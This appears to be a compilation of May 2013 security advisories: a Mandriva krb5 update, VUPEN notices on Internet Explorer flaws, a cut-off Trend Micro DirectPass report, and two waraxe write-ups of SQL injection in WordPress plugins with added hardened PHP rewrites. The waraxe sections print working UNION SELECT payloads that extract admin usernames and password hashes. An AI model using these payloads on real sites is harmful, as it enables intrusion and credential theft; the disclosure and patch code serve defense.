[ MDVSA-2013:166 ] krb5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:166
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : krb5
 Date    : May 21, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered and corrected in krb5:

 The kpasswd service provided by kadmind was vulnerable to a UDP
 ping-pong attack (CVE-2002-2443).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443
 https://bugzilla.redhat.com/show_bug.cgi?id=962531
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:
 762c01ff4ce813cd3c5acce794c29aa3  mes5/i586/krb5-1.8.1-0.11mdvmes5.2.i586.rpm
 415beef49e20f8b89c84b0270afbf1d6  mes5/i586/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.i586.rpm
 a6bd6778ab49710b1a50633555b0dc27  mes5/i586/krb5-server-1.8.1-0.11mdvmes5.2.i586.rpm
 497cfca620c25dd7ce523a61afdccc5e  mes5/i586/krb5-server-ldap-1.8.1-0.11mdvmes5.2.i586.rpm
 2fe4670b52795e8c74f53e7eee826c2c  mes5/i586/krb5-workstation-1.8.1-0.11mdvmes5.2.i586.rpm
 22926f634ea6ba5f816c14a2e30cc38a  mes5/i586/libkrb53-1.8.1-0.11mdvmes5.2.i586.rpm
 477f8f61cd9c8e577cd6797e850978ce  mes5/i586/libkrb53-devel-1.8.1-0.11mdvmes5.2.i586.rpm
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 1cab52ff4c719378b97ec3acbc7d911f  mes5/x86_64/krb5-1.8.1-0.11mdvmes5.2.x86_64.rpm
 b5d51d32e5eaa96ab973e5ce151a5254  mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.x86_64.rpm
 6218fc79250aaec5c7ca19b193fdb8dc  mes5/x86_64/krb5-server-1.8.1-0.11mdvmes5.2.x86_64.rpm
 88de99aa8cde8adaee672c265292a355  mes5/x86_64/krb5-server-ldap-1.8.1-0.11mdvmes5.2.x86_64.rpm
 39791a90573b4de08efdaf0193bbc5dc  mes5/x86_64/krb5-workstation-1.8.1-0.11mdvmes5.2.x86_64.rpm
 846b75578bb5559cfcf7aa2ce9e43156  mes5/x86_64/lib64krb53-1.8.1-0.11mdvmes5.2.x86_64.rpm
 7351a8d2be13df25ab9c2534489a2da0  mes5/x86_64/lib64krb53-devel-1.8.1-0.11mdvmes5.2.x86_64.rpm
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 3150d604a21be2373d223457da156734  mbs1/x86_64/krb5-1.9.2-3.3.mbs1.x86_64.rpm
 52729f0759e686cfdf5f9c99efc28862  mbs1/x86_64/krb5-pkinit-openssl-1.9.2-3.3.mbs1.x86_64.rpm
 4b997282ad6dd76eb7a10f07809bef71  mbs1/x86_64/krb5-server-1.9.2-3.3.mbs1.x86_64.rpm
 b10b3c0211e071ab93e818db684098f9  mbs1/x86_64/krb5-server-ldap-1.9.2-3.3.mbs1.x86_64.rpm
 417d23306554b1d7d290e8d3fed1a2d8  mbs1/x86_64/krb5-workstation-1.9.2-3.3.mbs1.x86_64.rpm
 a17c8e2438c0415c9ea478bcc0715101  mbs1/x86_64/lib64krb53-1.9.2-3.3.mbs1.x86_64.rpm
 2d05c4ac4b44be10ea1e3d4337689512  mbs1/x86_64/lib64krb53-devel-1.9.2-3.3.mbs1.x86_64.rpm
 95305e2323d63546e970538b7d692447  mbs1/SRPMS/krb5-1.9.2-3.3.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFRm3ZlmqjQ0CJFipgRAmRWAJ42vFSB5f9jXtt3hRarBQpqxARd/ACfa9qv
esFWMrXe/0P1/wv2ag87c6w=
=Lg3K
-----END PGP SIGNATURE-----
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)
Website : http://www.vupen.com
Twitter : http://twitter.com/vupen

I. BACKGROUND
-------------

Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers. (Wikipedia)

II. DESCRIPTION
---------------

VUPEN Vulnerability Research Team discovered a critical vulnerability in
Microsoft Internet Explorer.

The vulnerability is caused by an integer overflow error in the vml.dll
component when processing certain undocumented vector graphic properties,
which could be exploited by remote attackers to leak arbitrary memory and
compromise a vulnerable system via a malicious web page.

CVE: CVE-2013-2551

III. AFFECTED PRODUCTS
----------------------

Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6

Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2

IV. Binary Analysis & Exploits/PoCs
-----------------------------------

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit will be available through the VUPEN BAE
(Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit. The service allows governments and major corporations to evaluate
risks, and protect infrastructures and assets against new threats.

The service also allows security vendors (IPS, IDS, AntiVirus) to
supplement their internal research efforts and quickly develop both
vulnerability-based and exploit-based signatures to proactively protect
their customers from attacks and emerging threats.

V. VUPEN Threat Protection Program
----------------------------------

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability when it was discovered by VUPEN in advance of its public
disclosure, and have received detailed attack detection guidance to
protect national and critical infrastructures against potential 0-day
attacks exploiting this vulnerability:

http://www.vupen.com/english/services/tpp-index.php

VI. SOLUTION
------------

Apply MS13-037 security updates.

VII. CREDIT
-----------

This vulnerability was discovered by Nicolas Joly of VUPEN Security

VIII. ABOUT VUPEN Security
--------------------------

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical
networks and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php

IX. REFERENCES
--------------

http://technet.microsoft.com/en-us/security/bulletin/ms13-037
http://www.vupen.com/english/research.php

X. DISCLOSURE TIMELINE
----------------------

2011-11-09 - Vulnerability Discovered by VUPEN
2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013
2013-05-20 - Public disclosure
VUPEN Security Research - Microsoft Internet Explorer 10-9 Object Confusion Sandbox Bypass (MS13-037 / Pwn2Own)
Website : http://www.vupen.com
Twitter : http://twitter.com/vupen

I. BACKGROUND
-------------

Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers. (Wikipedia)

II. DESCRIPTION
---------------

VUPEN Vulnerability Research Team discovered a critical vulnerability in
Microsoft Internet Explorer.

The vulnerability is caused by an object confusion error in the IE broker
process when processing unexpected variant objects, which could allow an
attacker to execute arbitrary code within the context of the broker
process to bypass the Internet Explorer Protected Mode sandbox.

III. AFFECTED PRODUCTS
----------------------

Microsoft Internet Explorer 10
Microsoft Internet Explorer 9

Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2

IV. Binary Analysis & Exploits/PoCs
-----------------------------------

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit will be available through the VUPEN BAE
(Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit. The service allows governments and major corporations to evaluate
risks, and protect infrastructures and assets against new threats.

The service also allows security vendors (IPS, IDS, AntiVirus) to
supplement their internal research efforts and quickly develop both
vulnerability-based and exploit-based signatures to proactively protect
their customers from attacks and emerging threats.

V. VUPEN Threat Protection Program
----------------------------------

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability when it was discovered by VUPEN in advance of its public
disclosure, and have received detailed attack detection guidance to
protect national and critical infrastructures against potential 0-day
attacks exploiting this vulnerability:

http://www.vupen.com/english/services/tpp-index.php

VI. SOLUTION
------------

Apply MS13-037 security updates.

VII. CREDIT
-----------

This vulnerability was discovered by Nicolas Joly of VUPEN Security

VIII. ABOUT VUPEN Security
--------------------------

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical
networks and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php

IX. REFERENCES
--------------

http://technet.microsoft.com/en-us/security/bulletin/ms13-037
http://www.vupen.com/english/research.php

X. DISCLOSURE TIMELINE
----------------------

2011-11-23 - Vulnerability Discovered by VUPEN
2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013
2013-05-20 - Public disclosure
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities
Title:
======
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities

Date:
=====
2013-05-21

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

Trend Micro (Reference): http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951

VL-ID:
=====
894

Common Vulnerability Scoring System:
====================================
6.1

Introduction:
=============
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to
remember one password. Other features include: keystroke encryption, secure password generation, automatic
form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online accounts with just one password
and automatically log in to your websites with one click.

More Security - You get an extra layer of online security with a specially designed browser for online banking
and financial websites and protection from keylogging malware.

No Hassles - You don't have to be a technical wizard to benefit from this password service; it's simple to use.

Confidence - You can have peace of mind using a password service provided by an Internet security provider with
20+ years of experience.

All Your Devices - You can use the DirectPass password manager on Windows PCs, Android mobiles, Android tablets,
iPads and iPhones, and all devices are automatically encrypted and synchronized using the cloud.

(Copy of the Vendor Homepage: http://www.trendmicro.com/us/home/products/directpass/index.html )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official
Trend Micro DirectPass v1.5.0.1060 software.

Report-Timeline:
================
2013-03-08: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-03-09: Vendor Notification (Trend Micro - Security Team)
2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.)
2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server)
2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID Announcement)
2013-05-21: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Trend Micro
Product: DirectPass 1.5.0.1060

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
1.1
A local command injection vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 software.
The vulnerability allows local, low-privileged system user accounts to inject system-specific commands or local
path requests to compromise the software.

The vulnerability is located in the DirectPass master password setup module of the Trend Micro
InstallWorkspace.exe file. The master password module of the software lets users review the entered password
in the second step, for security reasons. The hidden (protected) master password only becomes visible in the
check module when the customer hovers the mouse over the censored password field. When the software displays
the hidden password in plain text, the command/path injection is executed from the unparsed master password
content in the field listing.

Exploitation of the vulnerability requires a low-privileged system user account with DirectPass access and low
or medium user interaction. Successful exploitation of the vulnerability results in software and system process
compromise or execution of local system-specific commands/paths.

Vulnerable File(s):
				[+] InstallWorkspace.exe

Vulnerable Module(s):
				[+] Setup Master Password

Vulnerable Parameter(s):
				[+] Master Password

Affected Module(s):
				[+] Check Listing (Master Password)


1.2
A persistent input validation vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060
software. The bug allows local attackers with a low-privileged system user account to inject malicious script
code on the application side (persistent) of the software.

The persistent web vulnerability is located in the DirectPass check module when listing a manipulated master
password. In step one, a malicious iframe is injected into the hidden field as the master password. The inserted
content is saved, and the execution happens in the next step, when the master password content is listed in the
last check module. To bypass the validation and execute the injected script code, the attacker needs to split
(%20) the input request.

Exploitation of the vulnerability requires medium user interaction and a low-privileged system user account with
DirectPass. Successful exploitation
[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
===============================================================================
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Spider Event Calendar is a highly configurable plugin which allows you to have
multiple organized events in a calendar. This plugin is one of the best
WordPress calendars available in the WordPress Directory. If you have problems
organizing your WordPress calendar events and displaying them in a calendar
format, then the Spider WordPress Calendar Plugin is the best solution.

http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html

Vulnerable is current version 1.3.0, older versions not tested.


### 1. Insufficient access check for AJAX operations in calendar.php ###

Reason:
 1. weak access control implementation
Preconditions:
 1. must be logged in as Wordpress user
Impact:
 1. Any Wordpress user can edit Spider Calendar

Php script calendar.php line 197:
[ source code start ]--------------------------------------------------------

add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit');
add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update');

function spider_calendar_quick_update(){
  global $wpdb;
  if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){
    $wpdb->update(
..
function spider_calendar_quick_edit(){
  global $wpdb;
  if(isset($_POST['calendar_id'])){
    $row=$wpdb->get_row(

[ source code end ]----------------------------------------------------------

We can see that the AJAX actions wp_ajax_spidercalendarinlineedit and
wp_ajax_spidercalendarinlineupdate are bound to the functions
spider_calendar_quick_edit and spider_calendar_quick_update. These two
functions are meant to be used only by the admin, but there is nothing to stop
low-privileged users. Even users with Subscriber access level can use those two
AJAX functions.

Test:

<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit" method="post">
<input type="hidden" name="calendar_id" value="1">
<input type="submit" value="Test">
</form>
</center></body></html>

Result: calendar editing form will be shown

Remark: this weakness in access control makes the next two SQL injection
vulnerabilities much more critical - there is no need for admin privileges;
even a low-level Wordpress user is able to exploit these vulnerabilities.


### 2. SQL Injection in calendar.php function spider_calendar_quick_update ###

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied POST parameter calendar_id
Preconditions:
 1. must be logged in as Wordpress user

Php script calendar.php line 199:
[ source code start ]--------------------------------------------------------

add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update');

function spider_calendar_quick_update(){
  global $wpdb;
  if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){
..
    $row=$wpdb->get_row("SELECT * FROM ".$wpdb->prefix."spidercalendar_calendar WHERE id=".$_POST['calendar_id']);

[ source code end ]----------------------------------------------------------

As seen above, the user-supplied POST parameter calendar_id is used in the SQL
query without any sanitization, resulting in an SQL injection vulnerability.

Test:

<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate" method="post">
<input type="hidden" name="calendar_title" value="1">
<input type="hidden" name="us_12_format_sp_calendar" value="2">
<input type="hidden" name="calendar_id" value="0 UNION SELECT 1,(SELECT CONCAT_WS(0x3a,user_login,user_pass,user_email)FROM wp_users WHERE ID=1),3,4,5,6,7">
<input type="submit" value="Test">
</form>
</center></body></html>

Result: on success, sensitive information about the Wordpress user with ID 1
is revealed: username, password hash and email.


### 3. SQL Injection in calendar.php function spider_calendar_quick_edit ###

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1.
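The two AJAX handlers from findings 1 and 2, rewritten with the checks the advisory says are absent. This is an added example, not the plugin's code or the vendor's fix. The hook names, function roles and the spidercalendar_calendar table follow the advisory; the nonce action name 'spider_calendar_inline', the manage_options capability and the column names 'title' and 'time' are assumptions.

```php
<?php
// Added example, not the Spider Event Calendar plugin's own code: the two
// AJAX handlers from the advisory with the missing authorisation and the
// unparameterised query fixed. Hook, function and table names follow the
// advisory; the nonce action 'spider_calendar_inline', the manage_options
// capability and the column names 'title'/'time' are assumptions.

add_action( 'wp_ajax_spidercalendarinlineedit',   'hardened_spider_calendar_quick_edit' );
add_action( 'wp_ajax_spidercalendarinlineupdate', 'hardened_spider_calendar_quick_update' );

/**
 * wp_ajax_* hooks fire for every logged-in user, Subscriber included (finding 1),
 * so the capability check has to be explicit. The nonce check additionally stops
 * a third-party page from driving an administrator's browser through the handler.
 */
function hardened_spider_calendar_authorize() {
    check_ajax_referer( 'spider_calendar_inline', 'nonce' ); // ends the request on failure
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }
}

function hardened_spider_calendar_quick_edit() {
    global $wpdb;
    hardened_spider_calendar_authorize();

    // calendar_id is an integer key: absint() reduces "0 UNION SELECT ..." to 0,
    // and the %d placeholder binds whatever survives as a number, never as SQL.
    $calendar_id = isset( $_POST['calendar_id'] ) ? absint( $_POST['calendar_id'] ) : 0;
    if ( 0 === $calendar_id ) {
        wp_send_json_error( array( 'message' => 'invalid calendar_id' ), 400 );
    }

    $row = $wpdb->get_row( $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}spidercalendar_calendar WHERE id = %d",
        $calendar_id
    ) );
    if ( null === $row ) {
        wp_send_json_error( array( 'message' => 'no such calendar' ), 404 );
    }
    wp_send_json_success( $row );
}

function hardened_spider_calendar_quick_update() {
    global $wpdb;
    hardened_spider_calendar_authorize();

    if ( ! isset( $_POST['calendar_id'], $_POST['calendar_title'], $_POST['us_12_format_sp_calendar'] ) ) {
        wp_send_json_error( array( 'message' => 'missing parameters' ), 400 );
    }
    $calendar_id = absint( $_POST['calendar_id'] );
    $title       = sanitize_text_field( wp_unslash( $_POST['calendar_title'] ) );
    $use_12h     = absint( $_POST['us_12_format_sp_calendar'] ) ? 1 : 0;
    if ( 0 === $calendar_id || '' === $title ) {
        wp_send_json_error( array( 'message' => 'invalid parameters' ), 400 );
    }

    // $wpdb->update() builds SET and WHERE through prepare() itself; the format
    // arrays pin each value to %s or %d so a string can never reach the id column.
    $updated = $wpdb->update(
        $wpdb->prefix . 'spidercalendar_calendar',
        array( 'title' => $title, 'time' => $use_12h ),
        array( 'id' => $calendar_id ),
        array( '%s', '%d' ),
        array( '%d' )
    );
    if ( false === $updated ) {
        wp_send_json_error( array( 'message' => 'update failed' ), 500 );
    }
    wp_send_json_success( array( 'rows_affected' => $updated ) );
}
```

The admin screen that issues these requests has to send wp_create_nonce( 'spider_calendar_inline' ) as the nonce POST field. With that in place the test form from finding 1 is rejected by check_ajax_referer() before any query runs, a Subscriber who obtains a valid nonce is still stopped by current_user_can(), and the calendar_id payload from finding 2 is reduced to the integer 0 and rejected before it reaches MySQL.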
[waraxe-2013-SA#105] - Multiple Vulnerabilities in Spider Catalog Wordpress Plugin
===============================================================================
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product in the catalog is assigned a relevant category, which makes it easier
for the customers to search and identify the needed products within the
catalog.

http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html

Vulnerable is current version 1.4.6, older versions not tested.


### 1. SQL Injection in Spider Catalog Shortcodes ###

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied shortcode parameter id
Preconditions:
 1. must be logged in as user with posting privileges
    (Author level required as minimum by default)

Php script catalog.php line 101:
[ source code start ]--------------------------------------------------------

add_shortcode('Spider_Catalog_Category', 'Spider_Catalog_Products_list_shotrcode');

function Spider_Catalog_Single_product_shotrcode($atts) {
  extract(shortcode_atts(array(
    'id' => '',
  ), $atts));
  return spider_cat_Single_product($id);
}
add_shortcode('Spider_Catalog_Product', 'Spider_Catalog_Single_product_shotrcode');
..
function spider_cat_Single_product($id) {
..
  return front_end_single_product($id);

[ source code end ]----------------------------------------------------------

We can see that two shortcodes are defined: Spider_Catalog_Category and
Spider_Catalog_Product. Both of them have an SQL injection vulnerability via
the shortcode parameter id. Let's analyze the shortcode Spider_Catalog_Product
implementation. The parameter id from the shortcode Spider_Catalog_Product is
passed to the function front_end_single_product() as its argument.

Php script front_end_functions.php line 18:
[ source code start ]--------------------------------------------------------

function front_end_single_product($id) {
..
  $product_id=$id;
..
  $query = "SELECT ".$wpdb->prefix."spidercatalog_products.*, ".$wpdb->prefix."spidercatalog_product_categories.name as cat_name
    FROM ".$wpdb->prefix."spidercatalog_products
    left join ".$wpdb->prefix."spidercatalog_product_categories
      on ".$wpdb->prefix."spidercatalog_products.category_id= ".$wpdb->prefix."spidercatalog_product_categories.id
    where ".$wpdb->prefix."spidercatalog_products.id='".$product_id."'
      and ".$wpdb->prefix."spidercatalog_products.published = '1' ";
  $rows = $wpdb->get_results($query);

[ source code end ]----------------------------------------------------------

As seen above, the parameter id is used in the SQL query without any
sanitization, which leads to an SQL injection vulnerability.

Tests:

Log in as a user with posting privileges and use the shortcode as below:

[Spider_Catalog_Product id=0' UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12#]

Now open the webpage containing the specific post and the MySQL version info
will be revealed.

Second test:

[Spider_Catalog_Product id=0' UNION SELECT 1,2,3,(SELECT CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE ID=1),5,6,7,8,9,10,11,12#]

As a result, sensitive information (username and hashed password) is revealed
for the Wordpress user with ID 1 (usually admin).

The SQL injection in the other shortcode can be exploited in a similar way:

[Spider_Catalog_Category id=0 UNION SELECT 1,2,@@version,4,5,6,7,8#]

.. and we can see the MySQL version info (look at the html source code):

<a style="cursor:pointer;" onclick="catt_idd_1(5.5.30)">Back to Catalog</a>


### 2. SQL Injection in catalog.php function catalog_after_search_results() ###

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter s
Preconditions:
 none

Php script catalog.php line 39:
[ source code start ]--------------------------------------------------------

function catalog_after_search_results($query){
  global $wpdb;
  if(isset($_REQUEST['s']) && $_REQUEST['s']){
    $serch_word=htmlspecialchars(stripslashes($_REQUEST['s']));
    $query=str_replace($wpdb->prefix."posts.post_content",
      gen_string_catalog_search($serch_word,$wpdb->prefix.'posts.post_content') . $wpdb->prefix."posts.post_content",
      $query);
  }
  return $query;
}
add_filter( 'posts_request', 'catalog_after_search_results');
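The product shortcode from finding 1 and the search filter from finding 2, rewritten so that neither the shortcode id nor the s parameter is spliced into SQL as text. This is an added example, not the plugin's code or the vendor's fix. The shortcode name, hook name and table names follow the advisory; the hardened_ function names, the product name column and the shape of the search fragment (the page does not show gen_string_catalog_search) are assumptions.

```php
<?php
// Added example, not the Spider Catalog plugin's own code: the product
// shortcode and the search filter from the advisory rewritten so that neither
// the shortcode id nor the s parameter is spliced into SQL as text. Table and
// hook names follow the advisory; the 'hardened_' function names, the product
// 'name' column and the shape of the search fragment are assumptions.

add_shortcode( 'Spider_Catalog_Product', 'hardened_spider_catalog_product_shortcode' );

function hardened_spider_catalog_product_shortcode( $atts ) {
    $atts = shortcode_atts( array( 'id' => '' ), $atts, 'Spider_Catalog_Product' );
    // Finding 1: id is an integer key. absint() turns "0' UNION SELECT ..." into 0,
    // and %d below would bind even a non-numeric survivor as a number.
    $product_id = absint( $atts['id'] );
    if ( 0 === $product_id ) {
        return '';
    }
    return hardened_front_end_single_product( $product_id );
}

function hardened_front_end_single_product( $product_id ) {
    global $wpdb;
    $products   = $wpdb->prefix . 'spidercatalog_products';
    $categories = $wpdb->prefix . 'spidercatalog_product_categories';

    $rows = $wpdb->get_results( $wpdb->prepare(
        "SELECT p.*, c.name AS cat_name
           FROM {$products} p
           LEFT JOIN {$categories} c ON p.category_id = c.id
          WHERE p.id = %d AND p.published = 1",
        $product_id
    ) );
    if ( empty( $rows ) ) {
        return '';
    }
    // The advisory's payloads surfaced through rendered markup, so the value is
    // HTML-escaped on the way out as well: prepare() closes the injection,
    // esc_html() keeps whatever the table holds from becoming markup.
    return '<div class="spider-catalog-product">' . esc_html( $rows[0]->name ) . '</div>';
}

// Finding 2: htmlspecialchars() is an HTML encoder, not a SQL escape, and with
// its pre-PHP 8.1 default flags it leaves single quotes untouched. The search
// term should reach MySQL only through prepare(); esc_like() additionally
// neutralises % and _ so the term cannot widen the LIKE pattern.
function hardened_catalog_search_fragment( $term ) {
    global $wpdb;
    $like = '%' . $wpdb->esc_like( $term ) . '%';
    return $wpdb->prepare(
        "(SELECT COUNT(*) FROM {$wpdb->prefix}spidercatalog_products WHERE name LIKE %s) > 0 OR ",
        $like
    );
}

add_filter( 'posts_request', 'hardened_catalog_after_search_results', 10, 2 );

function hardened_catalog_after_search_results( $request, $query ) {
    global $wpdb;
    // Only touch the main front-end search; admin screens and widgets run their own queries.
    if ( ! $query->is_main_query() || ! $query->is_search() ) {
        return $request;
    }
    $term = trim( (string) $query->get( 's' ) ); // WP_Query has already unslashed it
    if ( '' === $term ) {
        return $request;
    }
    // Same splice point as the original filter, ahead of the post_content
    // comparison; the user-controlled part now arrives pre-escaped from prepare().
    $column = $wpdb->prefix . 'posts.post_content';
    return str_replace( $column, hardened_catalog_search_fragment( $term ) . $column, $request );
}
```

With this in place the advisory's first test, [Spider_Catalog_Product id=0' UNION SELECT ...], is reduced to id 0 and renders nothing, and a search term containing a quote is escaped by prepare() rather than passed through htmlspecialchars(). The fragment still mirrors the original filter's str_replace() approach so the comparison stays close to the advisory's code; a cleaner design would join the products table in a posts_join/posts_where pair instead of rewriting the finished SQL string.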